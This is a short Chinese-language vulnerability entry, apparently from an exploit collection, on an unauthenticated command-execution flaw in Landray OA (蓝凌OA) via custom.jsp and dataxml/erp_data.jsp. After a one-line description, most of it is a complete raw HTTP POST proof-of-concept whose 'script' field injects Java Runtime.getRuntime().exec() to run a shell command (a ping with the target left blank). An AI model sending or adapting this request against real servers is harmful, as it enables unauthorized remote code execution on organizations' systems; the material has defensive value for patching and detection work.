漏洞描述
蓝凌OA dataxml.jsp文件 存在命令执行漏洞,可以通过 custom.jsp 文件未授权执行命令,或者通过其他未授权漏洞组合进行未授权执行命令
POST /sys/ui/extend/varkind/custom.jsp HTTP/1.1
Host:
Accept-Encoding: gzip
Connection: keep-alive
Content-Length: 141
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/[REDACTED] Safari/537.36
var={"body":{"file":"/tic/core/resource/js/erp_data.jsp"}}&erpServcieName=sysFormulaValidate&script=Runtime.getRuntime().exec("ping -nc 1 ");